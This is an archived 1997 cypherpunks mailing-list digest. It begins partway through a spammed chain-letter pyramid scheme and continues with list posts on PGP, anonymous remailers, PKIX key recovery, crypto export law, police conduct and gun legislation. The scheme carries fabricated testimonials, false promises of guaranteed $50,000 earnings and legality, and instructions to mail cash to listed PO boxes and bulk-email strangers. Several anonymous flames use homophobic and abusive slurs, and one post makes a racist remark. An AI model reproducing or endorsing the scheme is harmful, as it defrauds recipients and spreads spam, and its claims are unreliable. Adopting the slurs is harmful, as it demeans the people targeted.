sign. I DID! Sincerely, Christopher Erickson PS Do you have any idea what 11,700 $5 bills ($58,500) look like piled up on a kitchen table? It is AWESOME! "THREW IT AWAY" "I had received this program before. I threw it away, but later wondered if I should not have given it a try. Of course, I had no idea who to contact to get a copy, so I had to wait until I was emailed another copy of the program. Eleven months passed, then it came. I DID NOT throw this one away. I made $41,000 on the first try." Dawn W., Evansville, IN "NO FREE LUNCH" "My late father always told me, remember, Alan, there is no free lunch in life. You get out of life what you put into it.' Through trial and error and a somewhat slow frustrating start, I finally figured it out. The program works very well. I just had to find the right target group of people to email it to. So far this year, I have made over $63,000 using this program. I know my dad would have been very proud of me." Alan B., Philadelphia, PA A PERSONAL NOTE FROM THE ORIGINATOR OF THIS PROGRAM By the time you have read the enclosed information and looked over the enclosed program and reports, you should have concluded that such a program, and one that is legal, could not have been created by an amateur. Let me tell you a little about myself. I had a profitable business for ten years. Then in 1979 my business began falling off. I was doing the same things that were previously successful for me, but it was not working. Finally, I figured it out. It was not me, it was the economy. Inflation and recession had replaced the stable economy that had been with us since 1945. I do not have to tell you what happened to the unemployment rate . . . because many of you know from first hand experience. There were more failures and bankruptcies than ever before. The middle class was vanishing. Those who knew what they were doing invested wisely and moved up. Those who did not, including those who never had anything to save or invest, were moving down into the ranks of the poor. As the saying goes, "THE RICH GET RICHER AND THE POOR GET POORER." The traditional methods of making money will never allow you to "move up" or "get rich," inflation will see to that. You have just received information that can give you FINANCIAL FREEDOM for the rest of your life, with "NO RISK" and "JUST A LITTLE BIT OF EFFORT." You can make more money in the next few months than you have ever imagined. I should also point out that I will not see a penny of your money, nor anyone else who has provided a testimonial for this program. I have already made more than FOUR MILLION DOLLARS! I have retired from the program after sending out more than 16,000 programs. Now I have several offices that market this and several other programs here in the US and overseas. By Spring, we wish to market the 'Internet' by a partnership with AMERICA ON LINE. Follow the program EXACTLY AS INSTRUCTED. Do not change it in any way. It works exceedingly well as it is now. Remember to email a copy of this exciting program to everyone that you can think of. One of the people you send this to may send out 50,000 . . . and your name will be on every one of them! . Remember though, the more you send out, the more potential customers you will reach. So my friend, I have given you the ideas, information, materials and opportunity to become financially independent, IT IS UP TO YOU NOW! "THINK ABOUT IT" Before you delete this program from your mailbox, as I almost did, take a little time to read it and REALLY THINK ABOUT IT. Get a pencil and figure out what could happen when YOU participate. Figure out the worst possible response and no matter how you calculate it, you will still make a lot of money! Definitely get back what you invested. Any doubts you have will vanish when your first orders come in. IT WORKS! Paul Johnson, Raleigh, NC HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU $$$$$$ Let us say that you decide to start small, just to see how it goes. We will assume you and all those involved send out 2,000 programs each. Let us also assume that the mailing receives a .5% response. Using a good list, the response could be much better. Also, many people will send out hundreds of thousands of programs instead of 2,000. Nevertheless, continuing with this example, you send out only 2,000 programs. With a 5% response, that is only 10 orders for REPORT #1. Those 10 people respond by sending out 2,000 programs each for a total of 20,000. Out of those .5%, 100 people respond and order REPORT #2. Those 100 email out 2,000 programs each for a total of 200,000. The .5% response to that is 1,000 orders for REPORT #3. Those 1,000 send out 2,000 programs each for a total of 2,000,000. The .5% response to that is 10,000 orders for REPORT #4. That's 10,000 five dollar bills for you. CASH!!! Your total income in the example is $50 + $ 500 + $ 5,000 + $ 50,000 for! ! a total of $55,000!!! REMEMBER FRIEND, THIS IS ASSUMING 1,900 OUT OF 2,000 PEOPLE YOU MAIL TO WILL DO ABSOLUTELY NOTHING... AND TRASH THIS PROGRAM! DARE TO THINK FOR A MOMENT WHAT WOULD HAPPEN IF EVERYONE OR JUST � SENT OUT 100,000 PROGRAMS INSTEAD OF ONLY 2,000. Believe me, many people will do that and more! By the way, your cost to participate is practically nothing if you follow the program as it is outlined. You obviously already have an internet connection and email is FREE!!! REPORT #3 will show you the best methods for bulk emailing and purchasing email lists. THIS IS A LEGITIMATE, LEGAL, MONEY MAKING OPPORTUNITY. It does not require you to come into contact with people, do any hard work, and best of all, you never have to leave the house except to get your mail. If you believe that someday you will get that big break that you have been waiting for, THIS IS IT! Simply follow the instructions, and your dream will come true. This multi-level email order marketing program works perfectly... 100% EVERY TIME. Email is the sales tool of the future. Take advantage of this non-commercialized method of advertising NOW!! The longer you wait, the more people will be doing business using email. Get your piece of the pie!!! MULTI-LEVEL MARKETING (MLM) has finally gained respectability. It is being taught in the Harvard Business School, and both Stanford Research and The Wall Street Journal have stated that between 50% and 65% of all goods and services will be sold byMulti-Level methods by the mid to late 1990's. This is a Multi-Billion Dollar industry and of the 500,000 millionaires in the USA, 20% (100,000) made their fortune in the last several years in the MLM industry. Moreover, statistics show 45 people become millionaires everyday through Multi-Level Marketing. This is not a chain letter, but a perfectly legal money making opportunity. Basically, this is what we do: As with all multi-level business, we build our business by recruiting new partners and selling our products. Every state in the USA allows you to recruit new multi-level business partners, and we offer a product for EVERY dollar sent. YOUR ORDERS COME AND ARE FILLED THROUGH THE MAIL, so you are not involved in personal selling. You do it privately in your own home or office. This is the GREATEST Multi-Level Mail Order Marketing anywhere: Step (1) Order all four (4) REPORTS listed by NAME AND NUMBER. Do this by ordering the REPORT from each of the four (4) names listed on the next page. For each REPORT, send $5.00 cash and a SELF-ADDRESSED STAMPED ENVELOPE (BUSINESS SIZE # 10) to the person listed on that SPECIFIC REPORT. International orders should also include $1.00 extra for postage. It is essential that you specify the NAME and NUMBER of the REPORT requested tp the person you are ordering from. You will need ALL FOUR (4) REPORTS because you will be REPRINTING and RESELLING them. DO NOT alter the names or sequence other than what the instructions say. IMPORTANT: Always provide same day service on all orders. Step (2) Replace the name and address under REPORT #1 with your name, moving the one that was there down to REPORT #2. Drop the name and address under REPORT #2 TO REPORT #3, moving the one that was there to REPORT #4. The name and address that was under REPORT #4 is dropped from the list, and this party is no doubt on the way to the bank. When doing this make certain you type the names and addresses ACCURATELY! DO NOT MIX UP MOVING THE PRODUCT OR REPORT POSITIONS!!! Step (3) Having made the required changes in the NAME list, save it as a text (txt) file in it's own directory to be used with whatever email program you like. Again, REPORT #3 will tell you the best methods of BULK EMAILING and acquiring email lists. Step (4) Email a copy of the entire (all of this is very important) to everyone whose address you can get your hands on. Start with friends and relatives since you can encourage them to take advantage of this fabulous money-making opportunity. That's what I did. And they love me now, more than ever. Then email to anyone and everyone! Use your imagination! You can get email addresses from companies on the internet who specialize in email lists. Thes are very cheap, 100,000 addresses for around $35.00 IMPORTANT: You won't get a good response if you use an old list, so always request a FRESH, NEW LIST. You will find out where to purchase these lists when you order the four (4) REPORTS. ALWAYS PROVIDE SAME DAY SERVICE ON ALL ORDERS!!! REQUIRED REPORTS *** Order each REPORT by NUMBER and NAME*** ALWAYS SEND A SELF ADDRESSED, STAMPED ENVELOPE AND $5.00 CASH FOR EACH ORDER REQUESTING THE SPECIFIC REPORT BY NAME AND NUMBER!!! ______________________________________________________________________________ REPORT # 1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" ORDER REPORT #1 FROM; Bawkon Development Co. P.O. Box 180654 Utica, MI 48318-0654 ______________________________________________________________________________ REPORT # 2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES" ORDER REPORT # 2 FROM: Associated Business Connections P.O. Box 643 New Albany, OH 43054-0643 ______________________________________________________________________________REPORT # 3 "SOURCES FOR THE BEST MAILING LISTS" ORDER REPORT # 3 FROM: Kay James P.O. Box 33209 Denver, CO 80233-0209 ______________________________________________________________________________REPORT # 4 "EVALUATING MULTI-LEVEL SALES PLANS" ORDER REPORT # 4 FROM: Super Growth Group P.O. Box 9006 Gaithersburg, MD 20898-9006 ______________________________________________________________________________ CONCLUSION I am enjoying my fortune that I made by sending out this program. You too, will be making money in 20 to 90 days, if you follow the SIMPLE STEPS outlined in this mailing. To be financially independent is to be FREE. Free to make financial decisions as never before. Go into business, get into investments, retire or take a vacation. No longer will a lack of money hold you back. However, very few people reach financial independence, because when opportunity knocks, they choose to ignore it. It is much easier to say "NO" than "YES", and this is the question that you must answer. Will YOU ignore this amazing opportunity or will you take advantage of it? If you do nothing, you have indeed missed something and nothing will change. Please re-read this material, this is a special opportunity. If you have any questions, please feel free to write to the sender of this information. You will get a prompt and informative reply. My method is simple. I sell thousands of people a product for $5.00 that costs me pennies to produce and email. I should also point out that this program is legal and everyone who participates WILL make money. This is not a chain letter or pyramid scam. At times you have probably received chain letters, asking you to send money, on faith, but getting NOTHING in return, NO product what-so-ever! Not only are chain letters illegal, but the risk of someone breaking the chain makes them quite unattractive. You are offering a legitimate product to your people. After they purchase the product from you, they reproduce more and resell them. It's simple free enterprise. As you learned from the enclosed material, the PRODUCT is a series of four 4 FINANCIAL AND BUSINESS REPORTS. The information contained in these REPORTS will not only help you in making your participation in this program more rewarding, but will be useful to you in any other business decisions you make in the years ahead. You are also buying the rights to reprint all of the REPORTS, which will be ordered from you by those to whom you mail this program. The concise one and two page REPORTS you will be buying can easily be reproduced at a local copy center for a cost of about 5 cents a copy. Best wishes with the program and Good Luck! "IT WAS TRULY AMAZING" "Not being the gambling type, it took me several weeks to make up my mind to participate in this program. But conservative as I am, I decided that the initial investment was so little that there was no way that I could not get enough orders to at least get my money back. BOY, was I ever surprised when I found my medium sized post office box crammed with orders! I will make more money this year than any ten years of my life before." Mary Riceland, Lansing, MI TIPS FOR SUCCESS Send for your four 4 REPORTS immediately so you will have them when the orders start coming in. When you receive a order, you MUST send out the product/service to comply with US Postal and Lottery laws. Title 18 Sections 1302 and 1341 specifically state that: "A PRODUCT OR SERVICE MUST BE EXCHANGED FOR MONEY RECEIVED." WHILE YOU WAIT FOR THE REPORTS TO ARRIVE: 1. Name your new company. You can use your own name if you desire. 2. Get a post office box (preferred). 3. Edit the names and addresses on the program. You must remember, your name and address go next to REPORT # 1, and all the others move dowb\n one, with the fourth one being bumped OFF the list. 4. Obtain as many email addresses as possible to send until you receive the information on mailing list companies in REPORT #3. 5. Decide on the number of programs you intend to send out. The more you send, and the quicker you send them, the more money you will make. 6. After mailing the programs, get ready to fill the orders. 7. Copy the four 4 REPORTS so you are able to send them out as soon as you receive an order. IMPORTANT: ALWAYS PROVIDE SAME-DAY SERVICE ON ALL THE ORDERS YOU RECEIVE! 8. Make certain the letter and reports are neat and legible. YOUR GUARANTEE The check point which GUARANTEES your success is simply this: you must receive 15 to 20 orders for REPORT #1. This is a must!!! If you don't within two weeks, email out more programs until you do. Then a couple of weeks later you should receive at least 100 orders for REPORT #2, if you don't, send out more programs until you do. Once you have received 100 or more orders for REPORT #2, (take a deep breath) you can sit back and relax, because YOU COULD MAKE AT LEAST $50,000. Mathematically it is a proven guarantee. Of those who have participated in the program and reached the above GUARANTEES-ALL have reached their $50,000 goal. Also, remember, everytime your name is moved down the list you are in front of a different REPORT, so you can keep track of your program by knowing what people are ordering from you. IT'S THAT EASY, REALLY, IT IS!!! REMEMBER: "HE WHO DARES NOTHING, NEED NOT HOPE FOR ANYTHING." "INVEST A LITTLE TIME, ENERGY AND MONEY NOW OR SEARCH FOR IT FOR THE REST OF YOUR LIFE." From Michael.Johnson at mejl.com Fri Aug 15 07:09:13 1997 From: Michael.Johnson at mejl.com (Mike) Date: Fri, 15 Aug 1997 22:09:13 +0800 Subject: PGP for palmtops? In-Reply-To: Message-ID: <3.0.3.32.19970815154731.00992100@localhost> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Nate Sammons wrote: >Does PGP exist for palmtops like the HP 320LX? I would assume (possibly >foolishly) that the port would be easy, as they run Windows CE. Probably not. Visual C++ for CE just came out this week (http://www.microsoft.com/windowsce/developer/). PGP for 16-bit DOS works fine on the HP 200LX, but it's painfully slow. Decrypting a short message with a 2048 bit RSA key takes several minutes. -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBM/Rr08Uc8bdD9cnfEQLgxQCfWt/xsvs+4iaSjDqYNJJ8gRcw3BIAn20w Sue31Ewi1n0wDqeSZsqUmI/x =MB8v -----END PGP SIGNATURE----- Mike. From anon at anon.efga.org Fri Aug 15 07:19:31 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 15 Aug 1997 22:19:31 +0800 Subject: Remailer hating Nazis (was Re: The BIG Lie (Jesus Confesses)) Message-ID: At 9:34 AM, The Remailer Hating Nazi Patrick Oonk wrote: >You can't read, obviously. Actually, I learned to read in Kindergarten, and can still read nicely. I just don't contradict myself. >What I said was that it's a bit lame to flame me >and call me names, without giving me the oppportunity to mail you >directly, w/o bothering the other people on this list. Funny that other cypherpunks don't try to censor me. Most just delete crap that they don't want to read. So what's your story? >You twist my words around. Bullshit I did. You speak lowly of remailer users, but you make and run remailers, or at least, you ran remailers. >By the way, where did your wig-wearing faggot founding fathers of you suddenly go ? Knee-deep in your censorous Nazi rectum with muskets, you Hitlerist bigoting bastard. >Start coding, instead of just flaming people. So in addition to being too coward to run remailers, you are also a censorous little prick, eh? Don't tell me what to do, you fascist liar. >Post-natal abortion would have been a good solution for you. At least I'm not an inspiration for birth control, like you, Patty. I'm surprised that your family didn't disown you at the first sign of a head coming out. We need less Censor-happy Nazi cowards like you on this planet. From anon at anon.efga.org Fri Aug 15 07:28:14 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 15 Aug 1997 22:28:14 +0800 Subject: Remailer hating Nazis Message-ID: At 03:22 PM 8/15/97 +0200, The Remailer hating contradictory Nazi Cop wrote: >Some word-twisting asshole wrote: >> Sorry to hear you have such a low opinion of those who use >> anonymous remailers. Is your work on remailers an 'ego' thing, >> or are you a cop? > >I am a cop, but it boosts my ego too. HAHAHAHA!!!! Do you sodomize people with plungers since you're a cop? Kick the crap out of any potsmokers today?? I think your ego's so big it's going to give you back problems when you get older. >> So spam me, big boy. Spam me. > >Let the pros stick to that. Translated: I can't, I'm... I'm... a remailer hating coward!!! (sob sob) From anon at anon.efga.org Fri Aug 15 07:38:27 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 15 Aug 1997 22:38:27 +0800 Subject: Remailer hating Nazis Message-ID: The Platypus blithered this out: >Flaming via Anon reamilers is bad, not because its done via an anon >reamiler but because Flamming is mostly bad. If anything, flaming Anonymously is good, since you can say anything you damn well please without a care. It relieves stress. From andy at CCMSD.chem.uga.edu Fri Aug 15 07:49:02 1997 From: andy at CCMSD.chem.uga.edu (Andy Dustman) Date: Fri, 15 Aug 1997 22:49:02 +0800 Subject: Another Free Email Site with remailer possibilities In-Reply-To: <3.0.2.32.19970815030611.02ff46e8@popd.ix.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I've noted a couple of others which are very similar to Hotmail: www.rocketmail.com www.netaddress.com www.mailcity.com There are probably more. I've sorta hinted this to Ian... I was thinking the user login file could be modified so that it also used the e-mail system type, such as: hotmail user1 pass1 rocketmail user2 pass2 netaddress user3 pass 3 ... Andy Dustman / Computational Center for Molecular Structure and Design / UGA To get my PGP public key, send me mail with subject "send file key". For the ultimate anti-spam procmail recipe, send me mail with subject "spam" "Encryption is too important to leave to the government." -- Bruce Schneier http://www.ilinks.net/~dustman mailto:andy at CCMSD.chem.uga.edu <}+++< -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQEPAwUBM/RpEROPBZTHLz8dAQFJFwfNEdzlh4I6cwFlcRhfZsb/r4cMJ6d0GAIo 0lB7oWvqj6ilx1OfJ15mQF7eZGbe0H0aFi2XzcvIYS4hthIHz7dESvorhdokSX1R nqUIHyNDQZ3uAe3DQIf8XRhL1MeXjHSn7dlUylE5XVODp/wJgOKIsOAITzoKb3MT B99LLADCp6es6/JQRkb2WXiuMuxPbuDVc4qynfSa9X2aTvxb3ZXQiPCEA+ZnQ9+d rct75gXjwPnBmyOvvU2WBC4XTgqDpZLwWQVJqVK2pEFBEvqosrwhlD2RK7HJy1O9 eG223PUVxxDsp8Ksnkn9jNLNYZDWwF1ar+1r3J6wCxZzGA== =PJnb -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Fri Aug 15 08:08:05 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 15 Aug 1997 23:08:05 +0800 Subject: Remailer hating Nazis In-Reply-To: <199708151322.PAA18863@atro.pine.nl> Message-ID: <7gDHBe1w165w@bwalk.dm.com> Patrick Oonk writes: > I am pretty sure there is only one person as sad as you are. > (Except me of course). Go away. From sunder at brainlink.com Fri Aug 15 08:38:51 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Fri, 15 Aug 1997 23:38:51 +0800 Subject: Toilet plungers and sodomy: Why we should trust police blindly In-Reply-To: <031FBe4w165w@bwalk.dm.com> Message-ID: On Thu, 14 Aug 1997, Dr.Dimitri Vulis KOTM wrote: > Can you blame them? They have a quote for writing parking tickets and will > get in trouble for not writing enough; while they don't have a quota e.g. for > writing tickets to the folks who run red lights, and can get shot at if they > try to. Sure I can blame them. If they're unwilling to support the constitution and do what's right and proper by it, they don't belong in the police force, they belong in the congress with all the other political scum sucking bastards. > As for the regrettable incident with the plunger: while it sounds bad out of > context, it can be viewed as just desserts for the indignities the while people > in New York City have undergone under the Dinkins administration. If the > alleged victim (who already gave 3 highly contradictory stories of the events) > thinks that this city is so racist, why didn't he stay in his native Haiti? Probably for the same reason you didn't chose to remain in Russia and came here. :) Whatever crimes he might have been arrested for and allegedly commited don't mask or negate that the police raped him. Pure and simple. Did you mean "white" instead of "while"? I believe the pig^H^H^cop involved was hispanic not white, so your racist comment is out of place, but whatever... IMHO, Dinkins was a weak mayor, probably a puppet to someone else. Just dig up some old news bulletins and speeches of his and you'll see he's very meek and afraid. I doubt he had any control over this city. While under his regime, city hall was constantly surrounded by cops almost daily. I used to work near there and saw it durring lunch. Bomb scares and all that I think... Gee I wonder what he was afraid of? I wasn't around there that much when Guiliani came so I don't know if the blockades remained or not. Perhaps some other knowledgeable punk can answer that.... Still, all he did was battle with the UN and inflict a police state on us which does nothing but put tickets on windshields and steals cars parked on the public streets to sell them for profit, or holds them hostage for you. Obviously the laws of diminish returns apply to hiring cops as well.. at a certain point all the good cops are already hired and all you're left to hire is pure scum. =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From rah at shipwright.com Fri Aug 15 08:38:52 1997 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 15 Aug 1997 23:38:52 +0800 Subject: PKIX Part 3 REQUIRES SUPPORT OF KEY RECOVERY? Message-ID: --- begin forwarded text X-Authentication-Warning: blacklodge.c2.net: majordom set sender to owner-cryptography at c2.org using -f X-PGP-Key: X-Sender: rodney at pop3.pn.com Date: Fri, 15 Aug 1997 07:39:04 -0400 To: cryptography at c2.net From: Rodney Thayer Subject: PKIX Part 3 REQUIRES SUPPORT OF KEY RECOVERY? Mime-Version: 1.0 Sender: owner-cryptography at c2.net (This is a note I posted on the PKIX (Public Key Infrastructure) mailing list. I would be interested in comments on this document -- the draft is >-----BEGIN PGP SIGNED MESSAGE----- > >It seems to me that PKIX Part 3, section 2.2.2.1 "Centralised scheme" >requires that a conformant implementation support the capability of >generating the private key at the CA. This means that a conformant >implementation essentially is required to implement key recovery. > >I do not think that this conforms to IETF practice and I certainly do >not want to require CA implementations to support this capability. >If for some reason someone wants to implement this I can see it being >an optional feature but I do not think it is an acceptable mandatory >requirement. > >-----BEGIN PGP SIGNATURE----- >Version: PGP for Personal Privacy 5.0 >Charset: noconv > >iQCVAwUBM/Ph38KmlvJNktGxAQGM4AP6AxwWoXMuNo13f2tHxAb85eo4eCHSfE0D >OVvEqv3LrYyctkKULPkDb3IQKwEVkrba5EEVvFytyblgROh12eftgIfndqQWQyca >LLiUXZemSS59lD+gI0TFaqayOvAGJenN3SdxJDaQ6eiY04vjoxrLZ9/aX3/lnzYC >efAB14L23Eg= >=3M+q >-----END PGP SIGNATURE----- > > > --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From nobody at REPLAY.COM Fri Aug 15 09:47:00 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 16 Aug 1997 00:47:00 +0800 Subject: No charges for Ruby Ridge murderers Message-ID: <199708151630.SAA11335@basement.replay.com> WASHINGTON (AP) - The Justice Department today closed its investigation into whether the FBI's former deputy director tried to obstruct an inquiry into the deadly 1992 seige at Ruby Ridge, Idaho, saying it lacked evidence to bring criminal charges, governent officials said. The Justice Department decided not to bring charges against former FBI Deputy Director Larry Potts or Danny Coulson, Potts' deputy during the 1992 seige at the remote cabin of white supremacist Randy Weaver, said government officials who spoke on condition of anonymity. The Justice Department informed lawmakers and lawyers for the FBI agents that its review did not warrant any further criminal charges, but it left open the possibility of disciplinary action. The department said in a statement obtained by The Associated Press, "The available evidence does not support further criminal prosecution of FBI officials ... from the August 1992 incident at Ruby Ridge." From nobody at REPLAY.COM Fri Aug 15 10:00:51 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 16 Aug 1997 01:00:51 +0800 Subject: Reducing Crypto-Anonymous Crime by 50% Message-ID: <199708151634.SAA11624@basement.replay.com> Mike wrote: > Alice wants to receive e$1 from Bob. She creates a random number, blinds > it, and gives the blinded number to Bob. He shows the number to the > Mint, asking for a withdrawal of e$1 with a signature on this coin > number. Bob gives the signed and still blinded coin to Alice. She > unblinds it and spends it, end of story. It seems to me that many of the government's fascist goals for stopping strong crypto and anonymous financial transactions could be realized merely by whacking out Alice and Bob. An analysis of the cypherpunks list archives shows that most of the undesirable activities being perpetrated in the crypto-anonymity arena are the result of a conspiracy between Alice, Bob, and their shady friends. Anybody know their last names? A Concerned Cititzen From tcmay at got.net Fri Aug 15 10:04:30 1997 From: tcmay at got.net (Tim May) Date: Sat, 16 Aug 1997 01:04:30 +0800 Subject: Bringing Adam Back for Trial In-Reply-To: <199708140535.FAA01661@fountainhead.net> Message-ID: At 2:05 AM -0700 8/15/97, Bill Stewart wrote: >At 05:35 AM 8/14/97 +0000, Vipul Ved Prakash wrote: >>> Already been done. RSA in 4 lines of Perl, etc... Heck there was even a >>> site out that that cut a UUENCODED copy of PGP into many bits and asked >> >>Is RSA in 3 lines of PERL an ITAR violation? Its more like "meta" code for bc >>todo RSA. adam? > >Well, Raph Levien applied for an export permit for the RSA-in-4-lines-of-PERL >shirt several years ago, and the export thugs stalled on it and never >responded positively or negatively, in spite of their publicly stated >policies that they "will" respond in some small number of days. > >Since then, they've changed the laws, and the PERL RSA has gotten shorter... > >Of course, it's not a violation for Adam - he's not an American :-) But of course Adam was seen within U.S. borders wearing such a shirt. This means the act of importation had occurred, regardless of where Adam came from (and regardless of where the shirt was made, etc.). And once imported, code becomes subject to all of the usual ITARs and related laws. (They changed the name "ITAR" to something else, which I've forgotten...no doubt 5 people will post one-liners telling me what it is.) So unless Adam disposed of this shirt, to a bonafide American or America-approved subject, before his departure from the U.S. last summer.... Perhaps a DEA snatch team can be pressed into service to nab him in England, drug him, wrap him in tarps, and spirit him onto a C-5 cargo plane headed for the Land of the Freeh. --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From sunder at brainlink.com Fri Aug 15 10:08:38 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Sat, 16 Aug 1997 01:08:38 +0800 Subject: No charges for Ruby Ridge murderers In-Reply-To: <199708151630.SAA11335@basement.replay.com> Message-ID: On Fri, 15 Aug 1997, Anonymous wrote: > > WASHINGTON (AP) - The Justice Department today closed its > investigation into whether the FBI's former deputy director tried to > obstruct an inquiry into the deadly 1992 seige at Ruby Ridge, Idaho, > saying it lacked evidence to bring criminal charges, governent officials > said. Cover up on top of coverup on top of coverup. =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From bennett_t1 at popmail.firn.edu Fri Aug 15 10:30:57 1997 From: bennett_t1 at popmail.firn.edu (bennett_t1 at popmail.firn.edu) Date: Sat, 16 Aug 1997 01:30:57 +0800 Subject: Reducing Crypto-Anonymous Crime by 50% In-Reply-To: <199708151634.SAA11624@basement.replay.com> Message-ID: <3.0.2.32.19970815131306.007e3790@popmail.firn.edu> At 06:34 PM 8/15/97 +0200, you wrote: > An analysis of the cypherpunks list archives shows that most of >the undesirable activities being perpetrated in the crypto-anonymity >arena are the result of a conspiracy between Alice, Bob, and their >shady friends. > Anybody know their last names? I believe Bob's is Barker, and Alice's full is: Alice N. Wonderland. Sorry, couldn't resist. /===========================================================\ Help win the fight against weak encryption! Break RC5-56 -----------|> http://rc5.distributed.net/ <|------------- Member of Starbase XII RC5 Team \===========================================================/ From mastergraphics714 at usa.net Sat Aug 16 01:31:32 1997 From: mastergraphics714 at usa.net (mastergraphics714 at usa.net) Date: Sat, 16 Aug 1997 01:31:32 -0700 (PDT) Subject: Graphics Message-ID: <484847563093.OMP33374@usa.net>


Hello,

I design unique web graphics and web pages here in cyberspace. 
http://www.laughingbird.com

I'd like to help you redesign your webpages by adding professional images.
My prices are all flat rates. I don't believe in  "hourly" charges.

I also have some free software on my site for you to 
download. Made both for the Macintosh and Windows machines. There's a 
cartoon 
blackjack game... and a recipe program with 215 recipes called "The 
Laughingbird Restaurant" with colorful cartoon graphics. Both 
free, no strings attached. It's just my way of saying "thanks for 
checking me out".

If you're interested in having some nice, totally customized, graphics... 
animations... logos or Icons, please keep me in mind.

Thanks for listening.

Marc Sylvester
http://www.laughingbird.com







From rah at shipwright.com  Fri Aug 15 10:32:16 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 16 Aug 1997 01:32:16 +0800
Subject: ASSETS FORFEITURE BILL ON THE MOVE
Message-ID: 




--- begin forwarded text


X-Sender:  (Unverified)
Mime-Version: 1.0
Date: Fri, 15 Aug 1997 09:22:03 -0700
To: rah at shipwright.com
From: Vinnie Moscaritolo 
Subject: SSETS FORFEITURE BILL ON THE MOVE

GENERAL-RKBA digest 282


                ASSETS FORFEITURE BILL ON THE MOVE

     At press time, the U.S. House Judiciary Committee had passed
H.R. 1965 -- an assets forfeiture bill. This legislation contains
provisions that would allow the Clinton-Gore Administration to
seize the assets of virtually any business on any pretext --
including firearms-related businesses! Even if the warrant for
the original seizure is struck down, the government would then be
given additional time and "discovery" to examine the business
records to try and build a case to continue holding the assets
(read: firearms). Virtually any business that has any substantive
inventory and that is extensively regulated by the government is
in danger of having its goods seized -- even for non-criminal
regulatory infractions. H.R. 1965 is a Clinton-Reno scheme -- and
a civil rights nightmare -- and we strongly believe it will be
used as a tool against gun stores, collectors, or anyone else who
has a firearms collection or inventory worth stealing. We are
trying to work in Congress to get the needed changes to this
legislation before it is brought to the House floor, but it may
be put on a fast-track to try and dampen opposition. Call your
Congressman now at 202/224-3121, and explain the problems with
asset forfeiture from the gun owner's perspective, and urge him
to oppose the Reno-backed asset forfeiture scheme.


                  AND THE TALL TALES GET TALLER

     Hoping that going on the offensive would provide him with a
good defense, President Clinton has elevated the falsehoods
surrounding the Brady Act to new heights. Obviously anticipating
that the Supreme Court would strike down the "mandated background
check" provision of the Brady Act, the President, along with
Sarah Brady, began touting their latest statistics on the Brady
Act's "success." (For a complete summary of the Court's decision,
see the article on this subject in the September issue of the
American Guardian.) Previously, the President, Attorney General
Janet Reno, and others used the inflated figure of 186,000 to
note the number of felons, fugitives, and stalkers they claimed
were prevented from buying a handgun under Brady. That 186,000
figure was derived from a February 1997 Bureau of Justice
Statistics (BJS) report that concluded that of nine million
handgun transactions nationwide, 186,000 (2%) were rejected. The
President, in turn, incorrectly claimed that the BJS study showed
that the Brady Act had resulted in 186,000 handgun purchase
attempts by prohibited persons being denied. However, the BJS
stated on the front page of its report the 186,000 was a national
estimate. Recognizing that 18 states and the District of Columbia
have never been subject to Brady's five-day waiting period, BJS
noted only 86,000 denials occurred in the 32 "original Brady
states." Even that figure is inflated, however, because 12 of
those 32 states are no longer subject to Brady, having adopted
instant check or other laws in the past three years.
Additionally, many Brady-exempt states conduct records checks on
people who purchase long guns, while Brady only applies to
handguns. However, prior to the Court's ruling, Mr. Clinton upped
the ante by unveiling his newest "success statistic." According
to the President, apparently in the course of a few months, the
number of felons denied handgun purchases under Brady
miraculously skyrocketed to 250,000!

     Even if that claim was true, "handgun purchase
denials"--warranted or not (data indicates that most denials are
not)--is not the standard by which the Brady Act should be
judged. Rather, the effectiveness of a law titled the "Handgun
Violence Prevention Act" should be measured by how much handgun
violence is prevented. And on that test, Brady is a failure, as
we know our prisons aren't bursting at the seams from "felons"
who violated federal law by attempting to purchase a handgun. In
fact, there have still been only three individuals who've seen
the inside of a prison cell for violating the Brady Act.
Unfortunately, in addition to the numerous individuals who've
been denied a handgun purchase under the Brady Act because they
had unpaid parking tickets or had the same name as a prohibited
